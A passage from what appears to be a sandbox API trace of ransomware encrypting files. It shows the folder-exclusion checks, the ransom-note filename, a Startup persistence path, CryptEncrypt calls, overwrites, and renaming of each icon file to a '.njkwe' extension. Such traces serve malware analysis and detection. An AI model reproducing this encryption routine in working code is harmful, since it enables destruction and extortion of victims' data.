lpOverlapped=0x0) returned 1 [0062.140] GetProcessHeap () returned 0xbe0000 [0062.140] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0062.140] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.140] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0062.140] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0062.140] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0062.140] CloseHandle (hObject=0x42c) returned 1 [0062.141] GetProcessHeap () returned 0xbe0000 [0062.141] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0062.141] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico_r00t_{3sXlE5}.njkwe") returned 66 [0062.141] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico_r00t_{3sxle5}.njkwe")) returned 1 [0062.141] GetProcessHeap () returned 0xbe0000 [0062.141] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0062.141] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Rotate2.ico", cAlternateFileName="")) returned 1 [0062.141] lstrcmpiW (lpString1="Rotate2.ico", lpString2="Windows") returned -1 [0062.141] lstrcmpiW (lpString1="Rotate2.ico", lpString2="$Recycle.bin") returned 1 [0062.141] lstrcmpiW (lpString1="Rotate2.ico", lpString2="System Volume Information") returned -1 [0062.142] lstrcmpiW (lpString1="Rotate2.ico", lpString2="Program Files") returned 1 [0062.142] lstrcmpiW (lpString1="Rotate2.ico", lpString2="Program Files (x86)") returned 1 [0062.142] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 46 [0062.142] StrStrIW (lpFirst="Rotate2.ico", lpSrch=".njkwe") returned 0x0 [0062.142] lstrcmpW (lpString1="Rotate2.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0062.142] lstrcmpW (lpString1="Rotate2.ico", lpString2="taridd") returned -1 [0062.142] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0062.142] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0062.142] GetTickCount () returned 0x114ff50 [0062.142] GetTickCount () returned 0x114ff50 [0062.142] GetTickCount () returned 0x114ff50 [0062.142] GetTickCount () returned 0x114ff50 [0062.142] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0062.142] GetProcessHeap () returned 0xbe0000 [0062.142] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0062.142] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0062.144] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xfffffc82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.144] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x37e, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0062.144] GetProcessHeap () returned 0xbe0000 [0062.144] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0062.144] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.144] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0062.144] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0062.144] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0062.144] CloseHandle (hObject=0x42c) returned 1 [0062.145] GetProcessHeap () returned 0xbe0000 [0062.145] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0062.145] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico_r00t_{3sXlE5}.njkwe") returned 66 [0062.145] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico_r00t_{3sxle5}.njkwe")) returned 1 [0062.146] GetProcessHeap () returned 0xbe0000 [0062.146] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0062.146] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Rotate3.ico", cAlternateFileName="")) returned 1 [0062.146] lstrcmpiW (lpString1="Rotate3.ico", lpString2="Windows") returned -1 [0062.146] lstrcmpiW (lpString1="Rotate3.ico", lpString2="$Recycle.bin") returned 1 [0062.146] lstrcmpiW (lpString1="Rotate3.ico", lpString2="System Volume Information") returned -1 [0062.146] lstrcmpiW (lpString1="Rotate3.ico", lpString2="Program Files") returned 1 [0062.146] lstrcmpiW (lpString1="Rotate3.ico", lpString2="Program Files (x86)") returned 1 [0062.146] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 46 [0062.146] StrStrIW (lpFirst="Rotate3.ico", lpSrch=".njkwe") returned 0x0 [0062.146] lstrcmpW (lpString1="Rotate3.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0062.146] lstrcmpW (lpString1="Rotate3.ico", lpString2="taridd") returned -1 [0062.146] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0062.146] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0062.146] GetTickCount () returned 0x114ff60 [0062.146] GetTickCount () returned 0x114ff60 [0062.146] GetTickCount () returned 0x114ff60 [0062.146] GetTickCount () returned 0x114ff60 [0062.146] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0062.146] GetProcessHeap () returned 0xbe0000 [0062.146] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0062.146] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0062.148] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xfffffc82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.148] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x37e, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0062.151] GetProcessHeap () returned 0xbe0000 [0062.151] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0062.151] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.152] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0062.152] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0062.152] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0062.152] CloseHandle (hObject=0x42c) returned 1 [0062.152] GetProcessHeap () returned 0xbe0000 [0062.152] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0062.152] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico_r00t_{3sXlE5}.njkwe") returned 66 [0062.153] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico_r00t_{3sxle5}.njkwe")) returned 1 [0062.153] GetProcessHeap () returned 0xbe0000 [0062.153] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0062.153] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Rotate4.ico", cAlternateFileName="")) returned 1 [0062.153] lstrcmpiW (lpString1="Rotate4.ico", lpString2="Windows") returned -1 [0062.153] lstrcmpiW (lpString1="Rotate4.ico", lpString2="$Recycle.bin") returned 1 [0062.153] lstrcmpiW (lpString1="Rotate4.ico", lpString2="System Volume Information") returned -1 [0062.153] lstrcmpiW (lpString1="Rotate4.ico", lpString2="Program Files") returned 1 [0062.153] lstrcmpiW (lpString1="Rotate4.ico", lpString2="Program Files (x86)") returned 1 [0062.153] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 46 [0062.153] StrStrIW (lpFirst="Rotate4.ico", lpSrch=".njkwe") returned 0x0 [0062.153] lstrcmpW (lpString1="Rotate4.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0062.153] lstrcmpW (lpString1="Rotate4.ico", lpString2="taridd") returned -1 [0062.153] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0062.153] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0062.154] GetTickCount () returned 0x114ff60 [0062.154] GetTickCount () returned 0x114ff60 [0062.154] GetTickCount () returned 0x114ff60 [0062.154] GetTickCount () returned 0x114ff60 [0062.154] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0062.155] GetProcessHeap () returned 0xbe0000 [0062.155] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0062.155] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0062.156] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xfffffc82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.156] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x37e, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0062.156] GetProcessHeap () returned 0xbe0000 [0062.156] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0062.156] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.156] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0062.156] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0062.156] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0062.156] CloseHandle (hObject=0x42c) returned 1 [0062.157] GetProcessHeap () returned 0xbe0000 [0062.157] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0062.157] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico_r00t_{3sXlE5}.njkwe") returned 66 [0062.157] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico_r00t_{3sxle5}.njkwe")) returned 1 [0062.158] GetProcessHeap () returned 0xbe0000 [0062.158] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0062.158] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Rotate5.ico", cAlternateFileName="")) returned 1 [0062.158] lstrcmpiW (lpString1="Rotate5.ico", lpString2="Windows") returned -1 [0062.158] lstrcmpiW (lpString1="Rotate5.ico", lpString2="$Recycle.bin") returned 1 [0062.158] lstrcmpiW (lpString1="Rotate5.ico", lpString2="System Volume Information") returned -1 [0062.158] lstrcmpiW (lpString1="Rotate5.ico", lpString2="Program Files") returned 1 [0062.158] lstrcmpiW (lpString1="Rotate5.ico", lpString2="Program Files (x86)") returned 1 [0062.158] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned 46 [0062.158] StrStrIW (lpFirst="Rotate5.ico", lpSrch=".njkwe") returned 0x0 [0062.158] lstrcmpW (lpString1="Rotate5.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0062.158] lstrcmpW (lpString1="Rotate5.ico", lpString2="taridd") returned -1 [0062.158] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0062.158] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0062.158] GetTickCount () returned 0x114ff60 [0062.158] GetTickCount () returned 0x114ff60 [0062.158] GetTickCount () returned 0x114ff60 [0062.158] GetTickCount () returned 0x114ff60 [0062.158] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0062.158] GetProcessHeap () returned 0xbe0000 [0062.158] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0062.158] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0062.160] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xfffffc82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.160] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x37e, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0062.160] GetProcessHeap () returned 0xbe0000 [0062.160] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0062.160] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.160] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0062.160] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0062.160] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0062.160] CloseHandle (hObject=0x42c) returned 1 [0062.161] GetProcessHeap () returned 0xbe0000 [0062.161] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0062.161] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico_r00t_{3sXlE5}.njkwe") returned 66 [0062.161] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico_r00t_{3sxle5}.njkwe")) returned 1 [0062.162] GetProcessHeap () returned 0xbe0000 [0062.162] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0062.162] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Rotate6.ico", cAlternateFileName="")) returned 1 [0062.162] lstrcmpiW (lpString1="Rotate6.ico", lpString2="Windows") returned -1 [0062.162] lstrcmpiW (lpString1="Rotate6.ico", lpString2="$Recycle.bin") returned 1 [0062.162] lstrcmpiW (lpString1="Rotate6.ico", lpString2="System Volume Information") returned -1 [0062.162] lstrcmpiW (lpString1="Rotate6.ico", lpString2="Program Files") returned 1 [0062.162] lstrcmpiW (lpString1="Rotate6.ico", lpString2="Program Files (x86)") returned 1 [0062.162] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 46 [0062.162] StrStrIW (lpFirst="Rotate6.ico", lpSrch=".njkwe") returned 0x0 [0062.162] lstrcmpW (lpString1="Rotate6.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0062.162] lstrcmpW (lpString1="Rotate6.ico", lpString2="taridd") returned -1 [0062.162] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0062.162] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0062.162] GetTickCount () returned 0x114ff70 [0062.162] GetTickCount () returned 0x114ff70 [0062.162] GetTickCount () returned 0x114ff70 [0062.162] GetTickCount () returned 0x114ff70 [0062.162] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0062.162] GetProcessHeap () returned 0xbe0000 [0062.162] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0062.162] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0062.164] SetFilePointerEx (in: hFile=0x42c, 